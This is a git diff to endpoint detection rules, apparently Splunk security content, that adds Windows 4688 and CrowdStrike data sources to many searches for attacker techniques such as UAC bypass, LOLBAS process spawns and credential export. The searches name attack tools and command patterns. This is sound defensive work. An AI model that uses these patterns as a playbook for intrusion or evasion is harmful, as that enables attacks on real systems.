index 34f274ba3a..a166cbf42c 100644
--- a/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml
+++ b/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the PowerShell cmdlet `ex
   breaches.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process="*export-pfxcertificate*"
   by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml b/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml
index 7603dbc2ad..c757ae6f36 100644
--- a/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml
+++ b/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the Windows OS t
   risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name="klist.exe"
   OR Processes.original_file_name = "klist.exe" Processes.parent_process_name IN ("cmd.exe",
diff --git a/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml b/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml
index 87d2c4fbed..b3159bdd92 100644
--- a/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml
+++ b/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the decompile parameter w
   compromise and persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*-decompile*
   by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml b/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml
index d947e3ab84..b121af2adf 100644
--- a/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml
+++ b/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of nslookup.exe to que
   the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "nslookup.exe"
   OR Processes.original_file_name = "nslookup.exe") AND Processes.process = "*_ldap._tcp.dc._msdcs*"
diff --git a/detections/endpoint/windows_system_discovery_using_qwinsta.yml b/detections/endpoint/windows_system_discovery_using_qwinsta.yml
index 384ab9d953..cad6db4e70 100644
--- a/detections/endpoint/windows_system_discovery_using_qwinsta.yml
+++ b/detections/endpoint/windows_system_discovery_using_qwinsta.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of "qwinsta.exe" on a
   and further compromise of the host.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "qwinsta.exe"
   OR Processes.original_file_name = "qwinsta.exe" by Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/windows_system_logoff_commandline.yml b/detections/endpoint/windows_system_logoff_commandline.yml
index feb74b6866..47df27c902 100644
--- a/detections/endpoint/windows_system_logoff_commandline.yml
+++ b/detections/endpoint/windows_system_logoff_commandline.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows command
   efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where (Processes.process_name = shutdown.exe OR Processes.original_file_name = shutdown.exe)
diff --git a/detections/endpoint/windows_system_network_config_discovery_display_dns.yml b/detections/endpoint/windows_system_network_config_discovery_display_dns.yml
index 9a66d7d083..819e644fb7 100644
--- a/detections/endpoint/windows_system_network_config_discovery_display_dns.yml
+++ b/detections/endpoint/windows_system_network_config_discovery_display_dns.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the "ipconfig /d
   network-based attacks or lateral movement.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name="ipconfig.exe"
   OR Processes.original_file_name = "ipconfig.exe" AND Processes.process = "*/displaydns*"
diff --git a/detections/endpoint/windows_system_network_connections_discovery_netsh.yml b/detections/endpoint/windows_system_network_connections_discovery_netsh.yml
index 83a2f34969..30bb8b9341 100644
--- a/detections/endpoint/windows_system_network_connections_discovery_netsh.yml
+++ b/detections/endpoint/windows_system_network_connections_discovery_netsh.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows built-i
   access or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_netsh`AND Processes.process
   = "* show *" Processes.process IN ("*state*", "*config*", "*wlan*", "*profile*")
diff --git a/detections/endpoint/windows_system_reboot_commandline.yml b/detections/endpoint/windows_system_reboot_commandline.yml
index 7960407df0..8fc6f31501 100644
--- a/detections/endpoint/windows_system_reboot_commandline.yml
+++ b/detections/endpoint/windows_system_reboot_commandline.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the Windows comm
   downtime, data loss, or hindered incident response efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where (Processes.process_name = shutdown.exe OR Processes.original_file_name = shutdown.exe)
diff --git a/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml b/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml
index f3720020ef..125d4594ea 100644
--- a/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml
+++ b/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of Syncappvpublishings
   a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("wscript.exe","cscript.exe")
   Processes.process="*syncappvpublishingserver.vbs*" by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_system_shutdown_commandline.yml b/detections/endpoint/windows_system_shutdown_commandline.yml
index 2aa6d6ec78..e08094384d 100644
--- a/detections/endpoint/windows_system_shutdown_commandline.yml
+++ b/detections/endpoint/windows_system_shutdown_commandline.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of the Windows shut
   or evasion of security tools, impacting the overall security posture of the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where (Processes.process_name = shutdown.exe OR Processes.original_file_name = shutdown.exe)
diff --git a/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml b/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml
index c013297983..8112d779b7 100644
--- a/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml
+++ b/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of the w32tm.exe utility
   undetected.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process_name = w32tm.exe Processes.process= "* /stripchart *" Processes.process=
diff --git a/detections/endpoint/windows_system_user_discovery_via_quser.yml b/detections/endpoint/windows_system_user_discovery_via_quser.yml
index 6d2a13035e..6615b6fd5c 100644
--- a/detections/endpoint/windows_system_user_discovery_via_quser.yml
+++ b/detections/endpoint/windows_system_user_discovery_via_quser.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows OS tool
   privileges.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name="quser.exe"
   OR Processes.original_file_name = "quser.exe" by Processes.process_name Processes.original_file_name
diff --git a/detections/endpoint/windows_system_user_privilege_discovery.yml b/detections/endpoint/windows_system_user_privilege_discovery.yml
index 99dd2dfba5..7133161692 100644
--- a/detections/endpoint/windows_system_user_privilege_discovery.yml
+++ b/detections/endpoint/windows_system_user_privilege_discovery.yml
@@ -7,6 +7,8 @@ status: production
 type: Hunting
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of `whoami.exe` with the
   `/priv` parameter, which displays the privileges assigned to the current user account.
   It leverages data from Endpoint Detection and Response (EDR) agents, focusing on
diff --git a/detections/endpoint/windows_time_based_evasion.yml b/detections/endpoint/windows_time_based_evasion.yml
index 66c6773554..652ad00ac9 100644
--- a/detections/endpoint/windows_time_based_evasion.yml
+++ b/detections/endpoint/windows_time_based_evasion.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects potentially malicious processes that initiate
   a ping delay using an invalid IP address. It leverages data from Endpoint Detection
   and Response (EDR) agents, focusing on command-line executions involving "ping 0
diff --git a/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml b/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml
index 4b780c85e4..824ee4ec3e 100644
--- a/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml
+++ b/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the use of choice.exe in batch files as
   a delay tactic, a technique observed in SnakeKeylogger malware. It leverages data
   from Endpoint Detection and Response (EDR) agents, focusing on process names and
diff --git a/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml b/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml
index bdc5625734..043391f020 100644
--- a/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml
+++ b/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml
@@ -8,13 +8,15 @@ type: TTP
 description: The following analytic detects when an executable known for User Account
   Control (UAC) bypass exploitation spawns a child process in a user-controlled location
   or a command shell executable (e.g., cmd.exe, powershell.exe). This detection leverages
-  Sysmon Event ID 1 data, focusing on high or system integrity level processes with
+  Sysmon EventID 1 data, focusing on high or system integrity level processes with
   specific parent-child process relationships. This activity is significant as it
   may indicate an attacker has successfully used a UAC bypass exploit to escalate
   privileges. If confirmed malicious, this could allow the attacker to execute arbitrary
   commands with elevated privileges, potentially compromising the entire system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_integrity_level
   IN ("high","system") AND Processes.parent_process_name IN (`uacbypass_process_name`)
diff --git a/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml b/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml
index 7f18816f7f..e52844bd6f 100644
--- a/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml
+++ b/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml
@@ -8,13 +8,15 @@ type: TTP
 description: The following analytic detects when a process spawns an executable known
   for User Account Control (UAC) bypass exploitation and subsequently monitors for
   any child processes with a higher integrity level than the original process. This
-  detection leverages Sysmon Event ID 1 data, focusing on process integrity levels
+  detection leverages Sysmon EventID 1 data, focusing on process integrity levels
   and known UAC bypass executables. This activity is significant as it may indicate
   an attacker has successfully used a UAC bypass exploit to escalate privileges. If
   confirmed malicious, the attacker could gain elevated privileges, potentially leading
   to further system compromise and persistent access.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count max(_time) as lastTime from
   datamodel=Endpoint.Processes where Processes.process_integrity_level IN ("low","medium")
   by Processes.dest, Processes.user, Processes.process_name, Processes.process, Processes.process_guid,
diff --git a/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml b/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml
index 67361645f1..1265f51ed7 100644
--- a/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml
+++ b/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml
@@ -4,7 +4,7 @@ version: 1
 date: '2024-06-07'
 author: Teoderick Contreras, Splunk
 data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
 type: TTP
 status: production
 description: This detection identifies unsigned DLLs loaded through DLL side-loading with same file path with the process loaded the DLL, a technique observed in DarkGate malware. 
diff --git a/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml b/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml
index 5ac3b46ab7..3145bf094b 100644
--- a/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml
+++ b/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml
@@ -4,7 +4,7 @@ version: 2
 date: '2024-05-27'
 author: Teoderick Contreras, Splunk
 data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
 type: Anomaly
 status: production
 description: The following analytic identifies potential DLL side-loading instances
diff --git a/detections/endpoint/windows_valid_account_with_never_expires_password.yml b/detections/endpoint/windows_valid_account_with_never_expires_password.yml
index 8e84d9e45c..bbd1bc14bf 100644
--- a/detections/endpoint/windows_valid_account_with_never_expires_password.yml
+++ b/detections/endpoint/windows_valid_account_with_never_expires_password.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of net.exe to update user ac
   access to sensitive information.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where `process_net` AND Processes.process="* accounts *" AND Processes.process="*
diff --git a/detections/endpoint/windows_vulnerable_3cx_software.yml b/detections/endpoint/windows_vulnerable_3cx_software.yml
index 7dccbaa56b..92b8990d68 100644
--- a/detections/endpoint/windows_vulnerable_3cx_software.yml
+++ b/detections/endpoint/windows_vulnerable_3cx_software.yml
@@ -7,6 +7,8 @@ type: TTP
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects instances of the 3CXDesktopApp.exe with
   a FileVersion of 18.12.x, leveraging Sysmon logs. This detection focuses on identifying
   vulnerable versions 18.12.407 and 18.12.416 of the 3CX desktop app. Monitoring this
diff --git a/detections/endpoint/windows_windbg_spawning_autoit3.yml b/detections/endpoint/windows_windbg_spawning_autoit3.yml
index d9fca3e811..c8bbd6fdf2 100644
--- a/detections/endpoint/windows_windbg_spawning_autoit3.yml
+++ b/detections/endpoint/windows_windbg_spawning_autoit3.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies instances of the WinDBG process spawning
   AutoIt3. This behavior is detected by monitoring endpoint telemetry for processes
   where 'windbg.exe' is the parent process and 'autoit3.exe' or similar is the child
diff --git a/detections/endpoint/windows_winlogon_with_public_network_connection.yml b/detections/endpoint/windows_winlogon_with_public_network_connection.yml
index 4917a62735..2f9a4cf7c8 100644
--- a/detections/endpoint/windows_winlogon_with_public_network_connection.yml
+++ b/detections/endpoint/windows_winlogon_with_public_network_connection.yml
@@ -6,8 +6,7 @@ author: Michael Haag, Splunk
 status: experimental
 type: Hunting
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 3
+- Sysmon EventID 1 AND Sysmon EventID 3
 description: 'The following analytic detects instances of Winlogon.exe, a critical
   Windows process, connecting to public IP addresses. This behavior is identified
   using Endpoint Detection and Response (EDR) telemetry, focusing on network connections
diff --git a/detections/endpoint/windows_wmi_process_and_service_list.yml b/detections/endpoint/windows_wmi_process_and_service_list.yml
index c9499e2dfb..66318b4a45 100644
--- a/detections/endpoint/windows_wmi_process_and_service_list.yml
+++ b/detections/endpoint/windows_wmi_process_and_service_list.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies suspicious WMI command lines quer
   the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
   IN ("*process list*", "*service list*") by Processes.process_name Processes.original_file_name
diff --git a/detections/endpoint/windows_wmi_process_call_create.yml b/detections/endpoint/windows_wmi_process_call_create.yml
index efc4d39129..4b25361044 100644
--- a/detections/endpoint/windows_wmi_process_call_create.yml
+++ b/detections/endpoint/windows_wmi_process_call_create.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of WMI command lines u
   within the environment, posing a severe threat to organizational security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
   = "* process *" Processes.process = "* call *" Processes.process = "* create *"
diff --git a/detections/endpoint/winhlp32_spawning_a_process.yml b/detections/endpoint/winhlp32_spawning_a_process.yml
index 1193ec77ed..8a548f94a9 100644
--- a/detections/endpoint/winhlp32_spawning_a_process.yml
+++ b/detections/endpoint/winhlp32_spawning_a_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects winhlp32.exe spawning a child proces
   loads, and file modifications for further suspicious behavior.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winhlp32.exe
   Processes.process IN ("*\\appdata\\*","*\\programdata\\*", "*\\temp\\*") by Processes.dest
diff --git a/detections/endpoint/winrar_spawning_shell_application.yml b/detections/endpoint/winrar_spawning_shell_application.yml
index 5f72b97010..2664e41ba3 100644
--- a/detections/endpoint/winrar_spawning_shell_application.yml
+++ b/detections/endpoint/winrar_spawning_shell_application.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of Windows shell processes
   initiated by WinRAR, such as "cmd.exe", "powershell.exe", "certutil.exe", "mshta.exe",
   or "bitsadmin.exe". This detection leverages data from Endpoint Detection and Response
diff --git a/detections/endpoint/winrm_spawning_a_process.yml b/detections/endpoint/winrm_spawning_a_process.yml
index 8545e5ff94..f264bee32b 100644
--- a/detections/endpoint/winrm_spawning_a_process.yml
+++ b/detections/endpoint/winrm_spawning_a_process.yml
@@ -14,6 +14,8 @@ description: The following analytic detects suspicious processes spawned by WinR
   persistence, posing a severe threat to the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wsmprovhost.exe
   Processes.process_name IN ("cmd.exe","sh.exe","bash.exe","powershell.exe","pwsh.exe","schtasks.exe","certutil.exe","whoami.exe","bitsadmin.exe","scp.exe")
diff --git a/detections/endpoint/winword_spawning_cmd.yml b/detections/endpoint/winword_spawning_cmd.yml
index 0b0bee811b..b556dd77a0 100644
--- a/detections/endpoint/winword_spawning_cmd.yml
+++ b/detections/endpoint/winword_spawning_cmd.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Word (w
   or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winword.exe
   `process_cmd` by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/winword_spawning_powershell.yml b/detections/endpoint/winword_spawning_powershell.yml
index 70f84db7d7..8dcfca564b 100644
--- a/detections/endpoint/winword_spawning_powershell.yml
+++ b/detections/endpoint/winword_spawning_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Word (w
   further lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="winword.exe"
   `process_powershell` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/winword_spawning_windows_script_host.yml b/detections/endpoint/winword_spawning_windows_script_host.yml
index 97421a66cc..fe26ab1e9c 100644
--- a/detections/endpoint/winword_spawning_windows_script_host.yml
+++ b/detections/endpoint/winword_spawning_windows_script_host.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Winword
   or establish persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="winword.exe"
   Processes.process_name IN ("cscript.exe", "wscript.exe") by Processes.dest Processes.user
diff --git a/detections/endpoint/wmi_permanent_event_subscription.yml b/detections/endpoint/wmi_permanent_event_subscription.yml
index 4c15c26cac..66c5755a09 100644
--- a/detections/endpoint/wmi_permanent_event_subscription.yml
+++ b/detections/endpoint/wmi_permanent_event_subscription.yml
@@ -7,8 +7,7 @@ status: experimental
 type: TTP
 description: |-
   The following analytic detects the creation of permanent event subscriptions using Windows Management Instrumentation (WMI). It leverages Sysmon Event ID 5 data to identify instances where the event consumers are not the expected "NTEventLogEventConsumer." This activity is significant because it suggests an attacker is attempting to achieve persistence by running malicious scripts or binaries in response to specific system events. If confirmed malicious, this could lead to severe impacts such as data theft, ransomware deployment, or other damaging outcomes. Investigate the associated scripts or binaries to identify the source of the attack.
-data_source:
-- Windows Event Log WMI 5861
+data_source: []
 search: '`wmi` EventCode=5861 Binding | rex field=Message "Consumer =\s+(?<consumer>[^;|^$]+)"
   | search consumer!="NTEventLogEventConsumer=\"SCM Event Log Consumer\"" | stats
   count min(_time) as firstTime max(_time) as lastTime by ComputerName, consumer,
diff --git a/detections/endpoint/wmi_temporary_event_subscription.yml b/detections/endpoint/wmi_temporary_event_subscription.yml
index 3e9a1cee3b..8f1072481d 100644
--- a/detections/endpoint/wmi_temporary_event_subscription.yml
+++ b/detections/endpoint/wmi_temporary_event_subscription.yml
@@ -13,8 +13,7 @@ description: "The following analytic detects the creation of WMI temporary event
   code, escalate privileges, or persist in the environment. Analysts should review
   the specific WMI queries and assess their intent, considering potential false positives
   from legitimate administrative tasks."
-data_source:
-- Windows Event Log WMI 5860
+data_source: []
 search: '`wmi` EventCode=5860 Temporary | rex field=Message "NotificationQuery =\s+(?<query>[^;|^$]+)"
   | search query!="SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = ''wsmprovhost.exe''"
   AND query!="SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA ''AntiVirusProduct''
diff --git a/detections/endpoint/wmic_group_discovery.yml b/detections/endpoint/wmic_group_discovery.yml
index 8ec9c7c739..716380a511 100644
--- a/detections/endpoint/wmic_group_discovery.yml
+++ b/detections/endpoint/wmic_group_discovery.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the use of `wmic.exe` to enumera
   and persistence within the environment.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic.exe
   (Processes.process="*group get name*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/wmic_noninteractive_app_uninstallation.yml b/detections/endpoint/wmic_noninteractive_app_uninstallation.yml
index 4e598965b7..fb1fb67d6f 100644
--- a/detections/endpoint/wmic_noninteractive_app_uninstallation.yml
+++ b/detections/endpoint/wmic_noninteractive_app_uninstallation.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of the WMIC command-line
   within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic.exe
   Processes.process="* product *" Processes.process="*where name*" Processes.process="*call
diff --git a/detections/endpoint/wmic_xsl_execution_via_url.yml b/detections/endpoint/wmic_xsl_execution_via_url.yml
index dea2d4446b..70e85434ac 100644
--- a/detections/endpoint/wmic_xsl_execution_via_url.yml
+++ b/detections/endpoint/wmic_xsl_execution_via_url.yml
@@ -15,6 +15,8 @@ description: The following analytic detects `wmic.exe` loading a remote XSL scri
   posing a severe threat to the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
   IN ("*http://*", "*https://*") Processes.process="*/format:*" by Processes.parent_process_name
diff --git a/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml b/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml
index 320825cc45..f8d610725e 100644
--- a/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic detects `wmiprvse.exe` spawning a LOLBAS exe
   environment, posing a severe security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wmiprvse.exe)
   (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml b/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
index be80f2ab03..11cda609cc 100644
--- a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
+++ b/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies suspicious child processes spawne
   or maintain persistence within the environment, posing a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("cscript.exe", "wscript.exe") Processes.process_name IN ("regsvr32.exe", "rundll32.exe","winhlp32.exe","certutil.exe","msbuild.exe","cmd.exe","powershell*","wmic.exe","mshta.exe")
diff --git a/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml b/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml
index 7d85e2a050..2d595d3285 100644
--- a/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies `Wsmprovhost.exe` spawning a LOLB
   or maintain persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wsmprovhost.exe)
   (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/wsreset_uac_bypass.yml b/detections/endpoint/wsreset_uac_bypass.yml
index 6d27b6f43a..addf1d284f 100644
--- a/detections/endpoint/wsreset_uac_bypass.yml
+++ b/detections/endpoint/wsreset_uac_bypass.yml
@@ -14,7 +14,8 @@ description: The following analytic detects a suspicious modification of the reg
